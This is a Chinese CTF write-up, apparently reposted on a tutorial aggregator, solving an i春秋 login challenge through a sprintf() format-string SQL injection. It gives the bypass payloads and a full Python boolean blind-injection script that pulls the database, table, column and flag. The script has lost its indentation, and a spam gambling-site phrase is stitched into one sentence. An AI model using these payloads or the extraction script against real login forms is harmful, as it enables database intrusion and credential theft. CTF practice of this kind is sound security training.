i春秋SQLi

时间:2019-09-04
本文章向大家介绍i春秋SQLi,主要包括i春秋SQLi使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

打开题目网页是个很简单的登录网页

先查看源码,抓包

都没找到可用的信息

依我所见这里应该就是一个注入

但是怎么输入都会回显username错误

直到输入admin

尝试admin#

Admin’# ??username错误。。。

尝试万能密码。。。。。失败

先用bp去测试过滤的符号发现%会出现不一样的情况(刚学会的方法)

?

?

?

(测试方法

  1. 抓包
  2. intruder
  3. Positions中clear其他变量给admin(需要测量的地方)后面加上一个字符

    ?

    ?

  4. Payloadsadd需要测试的字符串或则符号

    ?

  5. start attack

    ?

    ?

    统计不一样的长度回显)

    回到网页中进行测试发现当username中存在%的时候会出现warning报错

    ?

    ?

    ?

    可能注入点就在这里了

    猜测就是sprintf()的漏洞

    关于sprintf()菜鸟hg0088平台攻略|免费注册给出如下解释

    ?

    ?

    ?

    这里附上一篇sprintf()漏洞利用的博客:https://blog.csdn.net/WQ_BCJ/article/details/85057447

    Payload:

    admin%1$\’?or 1=1#

    admin%1$\’?or 1=2#

    发现第一个会爆出密码错误第二个爆出用户名错误

    总结出or后面的内容如果错误则报出密码错误,如果正确就用户名错误

    所以这里就使用盲注

    这里附上一个dalao的脚本

    #coding:utf-8
    
    import requests
    import string
    
    def boom():
    url = r'http://083f8085e75f4ea099423ca97e616c729b921691cfe34e7c.changame.ichunqiu.com/index.php'
    s = requests.session()
    dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
    right = 'password error!'
    error = 'username error!'
    
    lens = 0
    i = 0
    while True:
    payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"
    data={'username':payload,'password':1}
    r = s.post(url,data=data).content
    if error in r:
    lens=i
    break
    i+=1
    pass
    print("[+]length(database()): %d" %(lens))
    
    strs=''
    for i in range(lens+1):
    for c in dic:
    payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"
    data = {'username':payload,'password':1}
    r = s.post(url,data=data).content
    if right in r:
    strs = strs + c
    print strs
    break
    pass
    pass
    print("[+]database():%s" %(strs))
    
    lens=0
    i = 1
    while True:
    payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"
    data = {'username':payload,'password':1}
    r = s.post(url,data=data).content
    if error in r:
    lens = i
    break
    i+=1
    pass
    print("[+]length(table): %d" %(lens))
    
    strs=''
    for i in range(lens+1):
    for c in dic:
    payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"
    data = {'username':payload,'password':1}
    r = s.post(url,data=data).content
    if right in r:
    strs = strs + c
    print strs
    break
    pass
    pass
    print("[+]table_name:%s" %(strs))
    tablename = '0x' + strs.encode('hex')
    table_name = strs
    
    lens=0
    i = 0
    while True:
    payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"
    data = {'username':payload,'password':1}
    r = s.post(url,data=data).content
    if error in r:
    lens = i
    break
    i+=1
    pass
    print("[+]length(column): %d" %(lens))
    
    strs=''
    for i in range(lens+1):
    for c in dic:
    payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
    data = {'username':payload,'password':1}
    r = s.post(url,data=data).content
    if right in r:
    strs = strs + c
    print strs
    break
    pass
    pass
    print("[+]column_name:%s" %(strs))
    column_name = strs
    
    num=0
    i = 0
    while True:
    payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
    data = {'username':payload,'password':1}
    r = s.post(url,data=data).content
    if error in r:
    num = i
    break
    i+=1
    pass
    print("[+]number(column): %d" %(num))
    
    lens=0
    i = 0
    while True:
    payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
    data = {'username':payload,'password':1}
    r = s.post(url,data=data).content
    if error in r:
    lens = i
    break
    i+=1
    pass
    print("[+]length(value): %d" %(lens))
    
    i=1 
    strs=''
    for i in range(lens+1):
    for c in dic:
    payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
    data = {'username':payload,'password':'1'}
    r = s.post(url,data=data).content
    if right in r:
    strs = strs + c
    print strs
    break
    pass
    pass
    print("[+]flag:%s" %(strs))
    
    if __name__ == '__main__':
    boom()
    print 'Finish!'
    

      

    (源码地址:https://www.ichunqiu.com/writeup/detail/157

    直接用盲注就爆出了flag

  6. ?

    ?

    ?

    ?

$flag 上一页 下一页